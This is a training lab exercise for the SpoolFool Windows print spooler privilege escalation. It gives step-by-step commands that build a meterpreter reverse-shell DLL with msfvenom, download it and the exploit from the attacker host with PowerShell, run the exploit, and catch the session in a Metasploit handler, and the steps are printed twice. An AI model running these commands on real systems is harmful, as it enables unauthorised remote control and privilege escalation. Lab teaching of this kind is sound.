Spool Fool Exploit

Exercise: Exploiting Windows Machine via SpoolFool Vulnerability

Objective: To demonstrate how to exploit a Windows machine via SpoolFool vulnerability and gain a reverse shell with escalated privileges.

Learning Outcomes:

  • Download and set up SpoolFool PoC on Kali Linux machine
  • Compromise Windows 7 machine and gain a reverse shell
  • Use msfvenom to create a custom DLL and upload it to the Windows 7 machine
  • Run the SpoolFool exploit to write the DLL to the print driver directory, causing privilege escalation
  • Start multi/handler in msfconsole and have a meterpreter session on the Windows 7 machine with escalated privileges
  • Understand how to exploit a Windows machine using SpoolFool vulnerability
  • Understand the importance of performing these exercises in a controlled and secure lab environment.
  • Understand the difference between a reverse shell and privilege escalation
  • Understand how to use msfvenom to create a custom DLL
  • Understand how to use a multi/handler in msfconsole
  • Understand how to check the current user’s permissions

Prerequisites:

  • A Windows 7 machine in a virtual environment (VirtualBox)
  • A Kali Linux machine in a virtual environment (VirtualBox)
  • A working internet connection
  • SpoolFool PoC (https://github.com/ly4k/SpoolFool) downloaded on the Kali Linux machine

Steps:

  1. First, we will need to download the PoC created by Oliver Lyak from the GitHub link provided in the previous response.
  2. Open a terminal in Kali Linux and navigate to the directory where you have downloaded the SpoolFool files.
  3. Use the command ls to check the files available in the directory. You should see an EXE file and a pre-made DLL payload.
  4. Next, we will need to compromise the Windows 7 machine and gain a reverse shell. For this, you can use any method of your choice such as Metasploit or manual exploitation. Once you have a reverse shell, you can check the current user’s permissions by running the command whoami /user /groups
  5. Now, we will create a custom DLL using msfvenom. For this exercise, we will use the meterpreter injection as the payload. Run the command msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IP_of_kali_machine LPORT=9501 > reverse_64bit.dll (replace IP_of_kali_machine with the IP address of your Kali Linux machine)
  6. Once the DLL is generated, we need to upload it to the Windows 7 machine. We recommend using the C:\Users\Public directory for this. You can start a python server and host the SpoolFool.exe and reverse_64bit.dll files in the same location. This can be done using the powershell module IWR by running the command powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf \Users\Public\reverse.dll and powershell -c iwr http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe (replace IP_of_kali_machine with the IP address of your Kali Linux machine)
  7. Now, we can run the exploit by using the command SpoolFool.exe -dll reverse.dll in the command prompt on the Windows 7 machine. Before running this command, make sure to set up multi/handler in msfconsole by running the command use multi/handler, set payload windows/x64/meterpreter/reverse_tcp, set LHOST IP_of_kali_machine and set LPORT 9501.
  8. Once the exploit is executed, you will notice that a new directory has been created in %temp%\d5f5….{random name} and a reparse point has been created to write into the print driver directory C:\Windows\system32\spool\DRIVERS\x64\4.
  9. The directory should now exist and the DLL should be saved in it, indicating a successful exploit. You should also see that the directory is writable by everyone.
  10. Finally, start the multi/handler in msfconsole by running the command run
  11. Now you should have a meterpreter session on the Windows 7 machine. To check the current user’s permissions and to confirm that the privileges have been escalated.

Note: This exercise is only for educational purposes and should be carried out in a controlled and secured lab environment.

Submission Detail:

  • Detailed report of steps taken, including screenshots of commands and their output
  • Specific versions of software used (Windows 7, Kali Linux, SpoolFool PoC)
  • Methodology used to compromise the Windows 7 machine
  • Reasoning behind the choice of payload and listener settings in msfvenom and msfconsole
  • Observations and results of the privilege escalation, such as the before and after permissions of the user and the final meterpreter session
  • Submit report in pdf format along with any supporting files (custom DLL, log files)
  • Exercise should be performed in a controlled and secured lab environment and should not be attempted on any production or live systems.

Reference:

				
					Steps:

First, we will need to download the PoC created by Oliver Lyak from the GitHub link provided in the previous response.
Open a terminal in Kali Linux and navigate to the directory where you have downloaded the SpoolFool files.
Use the command ls to check the files available in the directory. You should see an EXE file and a pre-made DLL payload.
Next, we will need to compromise the Windows 7 machine and gain a reverse shell. For this, you can use any method of your choice such as Metasploit or manual exploitation. Once you have a reverse shell, you can check the current user's permissions by running the command whoami /user /groups
Now, we will create a custom DLL using msfvenom. For this exercise, we will use the meterpreter injection as the payload. Run the command msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IP_of_kali_machine LPORT=9501 > reverse_64bit.dll (replace IP_of_kali_machine with the IP address of your Kali Linux machine)
Once the DLL is generated, we need to upload it to the Windows 7 machine. We recommend using the C:\Users\Public directory for this. You can start a python server and host the SpoolFool.exe and reverse_64bit.dll files in the same location. This can be done using the powershell module IWR by running the command powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf \Users\Public\reverse.dll and powershell -c iwr http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe (replace IP_of_kali_machine with the IP address of your Kali Linux machine)
Now, we can run the exploit by using the command SpoolFool.exe -dll reverse.dll in the command prompt on the Windows 7 machine. Before running this command, make sure to set up multi/handler in msfconsole by running the command use multi/handler, set payload windows/x64/meterpreter/reverse_tcp, set LHOST IP_of_kali_machine and set LPORT 9501.
Once the exploit is executed, you will notice that a new directory has been created in %temp%\d5f5….{random name} and a reparse point has been created to write into the print driver directory C:\Windows\system32\spool\DRIVERS\x64\4.
The directory should now exist and the DLL should be saved in it, indicating a successful exploit. You should also see that the directory is writable by everyone.
Finally, start the multi/handler in msfconsole by running the command run
Now you should have a meterpreter session on the Windows 7 machine. To check the current user's permissions and to confirm that the privileges have been escalated.
				
			
Open chat
Hello 👋.
Tell me, how can I help you?